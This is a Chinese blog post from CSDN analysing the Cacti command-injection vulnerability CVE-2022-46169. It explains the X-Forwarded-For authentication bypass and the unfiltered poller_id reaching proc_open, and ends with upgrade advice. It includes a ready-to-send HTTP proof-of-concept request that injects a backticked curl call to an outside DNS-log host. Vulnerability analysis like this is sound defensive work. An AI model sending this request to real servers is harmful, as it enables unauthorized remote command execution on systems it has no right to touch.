漏洞分析|Cacti命令执行漏洞 (CVE-2022-46169)

最新推荐文章于 2024-05-14 17:34:48 发布
最新推荐文章于 2024-05-14 17:34:48 发布
阅读量833 收藏 7
点赞数 10
文章标签: 笔记
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/xuandaoren/article/details/135550635
版权
本文详细描述了Cacti网络流量监测工具中的安全漏洞,涉及未经验证的身份验证绕过和命令注入。漏洞存在于remote_agent.php,影响版本低于1.2.23,攻击者可通过X-Forwarded-For和恶意构造的参数执行任意命令。官方已提供修复版本。
摘要由CSDN通过智能技术生成

1.漏洞描述

Cacti是一套基于PHP,MySQL,SNMP及RRDTool开发的网络流量监测图形分析工具,可为用户提供强大且可扩展的操作监控和故障管理框架。

该漏洞存在于remote_agent.php文件中,未经身份验证的恶意攻击者可以通过设置HTTP_变量绕过身份验证,再通过构造特殊的$poller_id 参数来触发proc_open() 函数,成功利用此漏洞可在目标服务器上执行任意命令,获取服务器的控制权限。

2.影响版本

Cacti < 1.2.23

3.影响范围

4.漏洞分析

我们先看补丁

https://github.com/Cacti/cacti/commit/7f0e16312dd5ce20f93744ef8b9c3b0f1ece2216

漏洞点主要存在于lib/functions.php、remote_agent.php

分为登录绕过和命令注入

登录绕过

我们先跟进 get_client_addr 看看

函数的作用是从 X-Forwarded-For等参数中获取值,filter_var 进行过滤,正确的地址就可以返回,X-Forwarded-For 参数可控,可以对其进行修改

接下来看remote_client_authorized函数的下半部分

gethostbyaddr 对 client_addr 获取网络主机名,当 $client_name 与 $client_addr 不同时, 进入remote_agent_strip_domain 函数

函数就是截取点号前面的值

大多数情况下,我们传进去的值为 127.0.0.1 时,就会返回 true 了

因此我们可以通过修改 X-Forwarded-For 来绕过这里的认证

命令注入

我们先看一下修复记录

跟进get_nfilter_request_var函数

函数的作用是直接获取参数,没用过滤

这里的 $local_data_ids 也是传进来的值,可控。

接下来我们关注这里的 $items ,是从数据库的 poller_item 表中取出来的,默认为空。

接下来当 $items 有了数据并且他的成员中有一个 item 也是一个数组并且键为 action,值为 2 时,即可进入命令注入的漏洞所在

在385 行有 proc_open 可以命令执行。

Poc:
GET /remote_agent.php?action=polldata&local_data_ids[0]=6&host_id=1&poller_id=`curl+dnslog.cn` HTTP/1.1
X-Forwarded-For: 127.0.0.1
Host: localhost.lan
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1

5.修复建议

官方已经提供修复的版本,直接 github 下载即可

https://github.com/Cacti/cacti

AttackSatelliteLab
关注
  • 10
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Cacti命令执行漏洞复现(CVE-2022-46169)
0xSec
02-02 3837
Cacti项目是一个开源平台,可为用户提供强大且可扩展的操作监控和故障管理框架。在1.2.22版本中存在一处命令注入漏洞,攻击者可以通过X-Forwarded-For请求头绕过服务端校验并在其中执行任意命令漏洞编号:CVE-2022-46169漏洞等级:严重。
CVE-2020-8813:Cacti v1.2.8远程代码执行CVE-2020-8813的官方漏洞利用
03-08
**CVE-2020-8813:Cacti v1.2.8 远程代码执行漏洞详解** Cacti是一款广泛使用的开源网络监控工具,它提供了图形化的界面来显示网络设备的性能数据,如流量、CPU利用率、内存使用情况等。在2020年,Cacti被发现存在...
Cacti 前台命令注入漏洞
SwBack的博客
05-08 950
Cacti是一个服务器监控与管理平台。基于PHP,MySQL,SNMP及RRDTool开发的网络流量监测图形分析工具. 在其1.2.17-1.2.22版本中存在一处命令注入漏洞,攻击者可以通过X-Forwarded-For请求头绕过服务端校验并在其中执行任意命令
CVE-2021-22205——Gitlab 远程命令执行漏洞复现(2),剖析网络安全开发未来的出路在哪里
2301_76225520的博客
04-17 117
朋友们如果有需要全套《网络安全入门+黑客进阶学习资源包》,可以扫描下方二维码领取(如遇扫码问题,可以在评论区留言领取哦)~,朋友们如果有需要全套《网络安全入门+黑客进阶学习资源包》,可以扫描下方二维码领取(如遇扫码问题,可以在评论区留言领取哦)~print(“[-] 目标 {} 不存在漏洞”.format(target_url))print(“[-] 目标 {} 不存在漏洞”.format(target_url))print(”[+] 目标 {} 存在漏洞".format(target_url))
Cacti命令执行漏洞分析 (CVE-2022-46169)
whoami
12-07 3985
Cacti是一套基于PHP,MySQL,SNMP及RRDTool开发的网络流量监测图形分析工具。在本漏洞中,攻击者可通过控制由get_nfilter_request_var()函数检索的参数$poller_id,以及构造local_data_ids参数,满足poller_item =POLLER_ACTION_SCRIPT_PHP条件,触发proc_open()函数,从而导致命令执行Cacti < 1.2.23从漏洞补丁可以看出,本次漏洞点主要存在于lib/functions.php、remote_age
cacti lib/rrd.php rrdtoll 1343,Cacti SQL注入漏洞(CNVD-2015-08486)
weixin_42651748的博客
04-01 247
### 0x01 漏洞简述CactiCacti集团的一套开源的网络流量监测和分析工具。该工具通过snmpget来获取数据,使用RRDtool绘画图形进行分析,并提供数据和用户管理功能。Cacti 0.8.8f以前版本存在SQL注入漏洞。允许远程攻击者通过graphphp属性行动中的rra_id参数执行任意SQL命令。### 0x02 漏洞细节漏洞存在于文件/cacti-0.8.8f/graph....
view.php 漏洞,Cacti graph_view.php SQL注入漏洞
weixin_33498296的博客
03-10 256
存在问题的文件/cacti/graph_view.php:/* ================= input validation ================= */input_validate_input_number(get_request_var_request('branch_id'));input_validate_input_number(get_request_var_req...
cacti graphs new.php,cacti后台SQL注入漏洞 --解决
weixin_33315077的博客
03-27 548
cacti后台SQL注入漏洞简介cacti后台SQL注入漏洞cacti /graphs_new.php中对$_POST["cg_g"]参数过滤不严,导致SQL注入的发生,可能导致敏感数据泄漏。解决方法在第4步1. 漏洞描述other SQL injection vulnerability via graphs_new.php in cacti was found, reported to the ...
CVE-2020-8813 Cacti v1.2.8 RCE.MD
04-13
CVE-2020-8813 Cacti v1.2.8 RCE
CACTI-95计费模板
02-21
CACTI-95计费模板,CACTI-95计费模板CACTI-95计费模板CACTI-95计费模板CACTI-95计费模板CACTI-95计费模板CACTI-95计费模板CACTI-95计费模板CACTI-95计费模板CACTI-95计费模板CACTI-95计费模板CACTI-95计费模板CACTI-...
cacti-0.8.7e-cn-utf8.tar.gz
02-09
1. **解压文件**:首先使用tar命令解压文件,如`tar -zxvf cacti-0.8.7e-cn-utf8.tar_1612877418`。 2. **安装依赖**:确保服务器上已经安装了Apache、PHP、MySQL以及SNMP等必要组件。 3. **配置数据库**:创建...
cacti cmd.php,Cacti cmd.php脚本远程SQL注入漏洞
weixin_39901213的博客
04-08 216
<?phpprint_r('--------------------------------------------------------------------------------Cacti <= 0.8.6i "cmd.php" popen() injectionby rgoddork: intitle:"login to cacti"mail: retrog at alic...
Cacti多个输入验证漏洞
weixin_33904756的博客
07-25 155
Cacti多个输入验证漏洞发布日期:2008-02-12更新日期:2008-07-16受影响系统:Raxnet Cacti 0.8.7a不受影响系统:Raxnet Cacti 0.8.7b描述:BUGTRAQ ID: 27749CVE(CAN) ID: CVE-2008-0786,CVE-2008-0785,CVE-2008-0784,CVE-2008-0783C...
cacti lib/rrd.php rrdtoll 1343,CVE-2020-8813:Cactiv1.2.8身份验证远程代码执行漏洞分析 - 嘶吼 RoarTalk – 回归最本质的信息安全,互联...
weixin_39526651的博客
04-01 221
0x01 Cacti 介绍Cacti是一个网络图形解决方案,利用RRDTool的数据存储和图形功能,Cacti提供了现成的高级图形模板,多种数据采集方法和用户管理功能。所有这些都封装在一个直观,易于使用的界面中。0x02 漏洞分析通过分析Cacti代码中的多个函数的代码发现了此漏洞,必须将多个因素联系在一起才能执行代码,该漏洞主要发生在攻击者尝试将恶意代码注入“ Cacti” cookie变量...
@valid 验证list_CVE20208813:Cacti v1.2.8 中经过身份验证的RCE漏洞分析
weixin_35986494的博客
12-01 375
关于CactiCacti是一套基于PHP,MySQL,SNMP及RRDTool开发的网络流量监测图形分析工具。Cacti通过 snmpget来获取数据,使用 RRDtool绘画图形,而且你完全可以不需要了解RRDtool复杂的参数。它提供了非常强大的数据和用户管理功能,可以指定每一个用户能查看树状结构、host以及任何一张图,还可以与LDAP结合进行用户验证,同时也能自己增加模板,功能非...
严重的Cacti漏洞可导致攻击者执行远程代码
最新发布
smellycat000的专栏
05-14 122
聚焦源代码安全,网罗国内外最新资讯!编译:代码卫士广泛使用的网络监控工具 Cacti 最近发布重要安全更新,修复了一系列漏洞,其中最严重的是CVE-2024-25641,CVSS评分为9.1。严重的RCE漏洞CVE-2024-25641可导致拥有“导入模板”权限的认证用户在托管 Cacti 应用的服务器上执行任意PHP代码。该漏洞是因为对函数 import_package() 中所上传的 XML...
漏洞复现】CVE-2022-46169 Cacti命令执行
m0_53121608的博客
07-13 513
漏洞复现】CVE-2022-46169 Cacti命令执行
Cacti 前台命令注入漏洞CVE-2022-46169) vulhub漏洞复现
qq_53003652的博客
07-17 501
在其1.2.17-1.2.22版本中存在一处命令注入漏洞,攻击者可以通过X-Forwarded-For请求头绕过服务端校验并在其中执行任意命令。的采集器,接下来创建一个新的图形,选择Device - Uptime”,点击创建。1.打开攻击机kali:192.168.126.130。靶机ubuntu:192.168.126.128。漏洞的利用需要Cacti应用中至少存在一个类似是。攻击机kali:192.168.126.130。账号密码为admin/admin。进入后一直点下一步进行初始化。
Struts2远程代码执行漏洞CVE-2020-17530) 复现及排查
dayouzi的博客
08-15 1166
Struts2是一个基于MVC设计模式的Web应用框架,它本质上相当于一个servlet,在MVC设计模式中,Struts2作为控制器(Controller)来建立模型与视图的数据交互。CVE-2020-17530是对CVE-2019-0230的绕过,Struts2官方对CVE-2019-0230的修复方式是加强OGNL表达式沙盒,而CVE-2020-17530绕过了该沙盒。在特定的环境下,远程攻击者通过构造恶意的OGNL表达式,可造成任意代码执行
cacti-1.2.16.tar.gz
12-07
cacti-1.2.16.tar.gz 是一个开源项目 cacti 的软件包文件。Cacti 是一个用于监控网络和系统的图形化工具。它基于 RRDtool,提供了强大的图表和图形化界面,帮助用户对网络设备、服务器和应用程序等进行性能监测和故障排除。 cacti-1.2.16.tar.gz 是 cacti 的 1.2.16 版本的源代码文件。用户可以通过下载和解压这个文件来获取 cacti 的源代码,并进行安装和使用。用户可以根据自己的需求编译和部署 cacti,以获取最新的功能和修复的 bug。 使用 cacti,用户可以创建多种类型的图表,例如折线图、饼图、柱状图等,来展示网络和系统的运行情况。用户可以通过添加设备和数据源,配置图形模板和数据采集周期等,来监控各种网络设备和服务器的性能指标,包括 CPU 利用率、内存使用率、网络流量、带宽利用率等。此外,cacti 还支持报警功能,当监控指标超过用户设置的阈值时,可通过电子邮件或短信通知用户。 总之,cacti-1.2.16.tar.gz 是 cacti 项目的源代码文件,是一个功能强大的网络和系统监控工具。用户可以通过下载和使用这个文件,来监控和优化自己的网络和系统环境。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值